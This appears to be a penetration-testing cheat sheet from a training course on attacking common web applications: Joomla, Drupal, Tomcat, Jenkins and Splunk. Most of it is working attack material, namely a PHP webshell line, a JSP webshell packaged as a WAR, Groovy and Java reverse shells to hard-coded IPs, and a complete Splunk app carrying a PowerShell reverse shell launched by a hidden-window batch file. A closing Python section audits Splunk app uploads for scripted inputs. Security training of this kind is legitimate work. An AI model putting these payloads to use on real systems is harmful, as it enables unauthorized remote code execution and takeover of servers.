Attacking Common Applications

Application Discovery & Enumeration

sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list

Using EyeWitness

source eyewitness-venv/bin/activate
python Python/EyeWitness.py --web -x web_discovery.xml -d inlanefreight_eyewitness

WordPress

  • WPScan
  • WordPress themes are located at /wp-content/themes/<theme name>.

Joomla

droopescan

droopescan scan joomla --url http://dev.inlanefreight.local/

When you have access to the Control Panel (/administrator/index.php):

  1. Click on Templates on the bottom left under Configuration to pull up the templates menu.
  2. Click on a template name. This will bring us to the Templates: Customise page.
  3. Click on a page to pull up the page source.
  4. Insert PHP code like: system($_GET['cmd']);
  5. curl -s http://example.com/templates/<template name>/file.php?cmd=id

Drupal

droopescan

droopescan scan drupal -u http://drupal.inlanefreight.local

RCE using the PHP Filter module

Download the module

wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Once downloaded, go to Administration > Reports > Available updates.

Once the module is installed, we can click on Content and create a new basic page.

Tomcat

Login Brute Force

Use the auxiliary/scanner/http/tomcat_mgr_login Metasploit module.

Tomcat Manager - WAR File Upload

Browse to /manager/html.

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

Upload the backup.war file and go to /backup/cmd.jsp.

Jenkins

The script console (/script) allows a user to run Apache Groovy scripts.

Linux Host

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows Host

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}")

String host="10.10.10.10";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Splunk

Reverse shell via package upload

Reference: https://github.com/0xjpuff/reverse_shell_splunk

Directory structure

splunk_shell
├── bin
│   ├── rev.py
│   ├── run.bat
│   └── run.ps1
└── default
    └── inputs.conf

run.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

run.bat

@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit

inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

Package the app

tar -cvzf updater.tar.gz splunk_shell/

Start a listener, then go to the /en-US/manager/search/apps/local endpoint and choose Install app from file.
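From the defender's side, the same inputs.conf format is what an admin should inspect before installing an app from file: every enabled [script://...] stanza is a command Splunk will run on a schedule. The following Python is an added example (not part of these notes or the referenced repo); it builds a splunk_shell-style .tar.gz in memory from constructed fixture content mirroring the layout above and reports the scripted inputs it would schedule. The names build_sample_app and audit_app are mine.

```python
import configparser
import io
import tarfile

# Constructed fixture mirroring the splunk_shell layout above (not a real app).
INPUTS_CONF = """\
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\\bin\\run.bat]
disabled = 0
interval = 10
"""


def build_sample_app(inputs_conf: str = INPUTS_CONF) -> bytes:
    """Build the .tar.gz in memory, as the tar command above would on disk."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in (("splunk_shell/bin/rev.py", b"# placeholder\n"),
                           ("splunk_shell/bin/run.bat", b"@ECHO OFF\n"),
                           ("splunk_shell/default/inputs.conf", inputs_conf.encode())):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def audit_app(tar_bytes: bytes) -> list:
    """Return (inputs.conf path, script path, interval) per enabled script:// stanza."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith("inputs.conf"):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            conf = configparser.ConfigParser(interpolation=None, strict=False)
            conf.read_string(text)
            for section in conf.sections():
                if not section.startswith("script://"):
                    continue
                # Only "disabled = 1" prevents execution; anything else runs on schedule.
                if conf.get(section, "disabled", fallback="0").strip() == "1":
                    continue
                findings.append((member.name, section[len("script://"):],
                                 conf.get(section, "interval", fallback=None)))
    return findings
```

Any finding that points at a .bat, .ps1 or .py under bin/ in an app nobody vetted is reason to reject the upload and review who has app-install rights on the instance.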